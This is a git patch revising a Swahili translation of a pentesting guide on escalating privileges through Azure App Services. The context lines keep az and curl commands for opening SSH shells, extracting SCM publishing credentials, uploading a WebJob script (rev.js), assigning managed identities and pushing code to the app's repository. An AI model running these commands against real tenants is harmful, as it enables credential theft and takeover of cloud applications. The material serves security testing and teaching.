From 898642b1143062b7caaf5072c7d31adf57ba7fcc Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 8 Jan 2025 21:08:49 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation --- .../az-app-services-privesc.md | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md index 290d0fb17..d3795c732 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md @@ -19,7 +19,7 @@ Ruhusa hizi zinaruhusu kupata **SSH shell** ndani ya programu ya wavuti. Pia zin # Direct option az webapp ssh --name --resource-group ``` -- **Unda tunnel kisha ungana na SSH**: +- **Unda tunnel kisha unganisha na SSH**: ```bash az webapp create-remote-connection --name --resource-group @@ -41,7 +41,7 @@ ssh root@127.0.0.1 -p 39895 ### Obtaining SCM Credentials & Enabling Basic Authentication -Ili kupata SCM credentials, unaweza kutumia **commands and permissions** zifuatazo: +Ili kupata akreditivu za SCM, unaweza kutumia **commands and permissions** zifuatazo: - The permission **`Microsoft.Web/sites/publishxml/action`** allows to call: ```bash @@ -116,9 +116,9 @@ az webapp deployment list-publishing-credentials --name --resource-gr "type": "Microsoft.Web/sites/publishingcredentials" } ``` -Kumbuka jinsi **akihifadhi ni sawa** na katika amri ya awali. +Kumbuka jinsi **akihesabu ni sawa** na amri ya awali. -- Chaguo lingine lingekuwa **kweka akihifadhi zako** na kuzitumia: +- Chaguo lingine lingekuwa **kweka akihesabu zako** na kuzitumia: ```bash az webapp deployment user set \ --user-name hacktricks \ @@ -153,7 +153,7 @@ az rest --method PUT \ ``` ### Publish code using SCM credentials -Kuwa na SCM credentials halali inaruhusu **kuchapisha msimbo** kwenye huduma ya App. Hii inaweza kufanywa kwa kutumia amri ifuatayo. +Kuwa na akreditivu halali za SCM inaruhusu **kuchapisha msimbo** kwenye huduma ya App. Hii inaweza kufanywa kwa kutumia amri ifuatayo. Kwa mfano huu wa python unaweza kupakua repo kutoka https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, fanya **mabadiliko** yoyote unayotaka na kisha **zip kwa kukimbia: `zip -r app.zip .`**. @@ -186,7 +186,7 @@ curl "/wwwroot/App_Data/jobs/" \ curl "https://nodewebapp-agamcvhgg3gkd3hs.scm.canadacentral-01.azurewebsites.net/wwwroot/App_Data/jobs/continuous/job_name/rev.js" \ --user ':' ``` -- Unda **continuous Webjob**: +- Unda **Webjob isiyokatizwa**: ```bash # Using Azure permissions az rest \ @@ -205,7 +205,7 @@ curl -X PUT \ ``` ### Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action -Hizi ruhusa zinaruhusu **kuteua utambulisho ulioendeshwa** kwa huduma ya App, hivyo ikiwa huduma ya App ilikuwa imevunjwa hapo awali hii itaruhusu mshambuliaji kuteua utambulisho mpya ulioendeshwa kwa huduma ya App na **kuinua mamlaka** kwao. +Hizi ruhusa zinaruhusu **kuteua utambulisho uliopewa usimamizi** kwa huduma ya App, hivyo ikiwa huduma ya App ilishambuliwa hapo awali hii itamruhusu mshambuliaji kuteua utambulisho mpya uliopewa usimamizi kwa huduma ya App na **kuinua mamlaka** kwao. ```bash az webapp identity assign --name --resource-group --identities /subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/ ``` @@ -250,14 +250,14 @@ https://graph.microsoft.com/v1.0/me/drive/root/children ``` ### Update App Code from the source -- Ikiwa chanzo kilichowekwa ni mtoa huduma wa tatu kama Github, BitBucket au Azure Repository, unaweza **kusaidia kuboresha msimbo** wa huduma ya App kwa kuingilia msimbo wa chanzo katika hifadhi. +- Ikiwa chanzo kilichowekwa ni mtoa huduma wa tatu kama Github, BitBucket au Azure Repository, unaweza **kusaidia kuboresha** msimbo wa huduma ya App kwa kuingilia msimbo wa chanzo katika hifadhi. - Ikiwa programu imewekwa kutumia **hifadhi ya git ya mbali** (ikiwa na jina la mtumiaji na nenosiri), inawezekana kupata **URL na akreditif za msingi za uthibitishaji** ili kunakili na kusukuma mabadiliko kwa: - Kutumia ruhusa **`Microsoft.Web/sites/sourcecontrols/read`**: `az webapp deployment source show --name --resource-group ` - Kutumia ruhusa **`Microsoft.Web/sites/config/list/action`**: - `az webapp deployment list-publishing-credentials --name --resource-group ` - `az rest --method POST --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"` -- Ikiwa programu imewekwa kutumia **hifadhi ya git ya ndani**, inawezekana **kunakili hifadhi** na **kusukuma mabadiliko** ndani yake: -- Kutumia ruhusa **`Microsoft.Web/sites/sourcecontrols/read`**: Unaweza kupata URL ya hifadhi ya git kwa `az webapp deployment source show --name --resource-group `, lakini itakuwa sawa na URL ya SCM ya programu yenye njia `/.git` (kwa mfano `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`). +- Ikiwa programu imewekwa kutumia **hifadhi ya git ya ndani**, inawezekana **kunakili hifadhi** na **kusukuma mabadiliko** kwake: +- Kutumia ruhusa **`Microsoft.Web/sites/sourcecontrols/read`**: Unaweza kupata URL ya hifadhi ya git kwa `az webapp deployment source show --name --resource-group `, lakini itakuwa sawa na URL ya SCM ya programu yenye njia `/.git` (kwa mfano, `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`). - Ili kupata akreditif za SCM unahitaji ruhusa: - **`Microsoft.Web/sites/publishxml/action`**: Kisha endesha `az webapp deployment list-publishing-profiles --resource-group -n `. - **`Microsoft.Web/sites/config/list/action`**: Kisha endesha `az webapp deployment list-publishing-credentials --name --resource-group `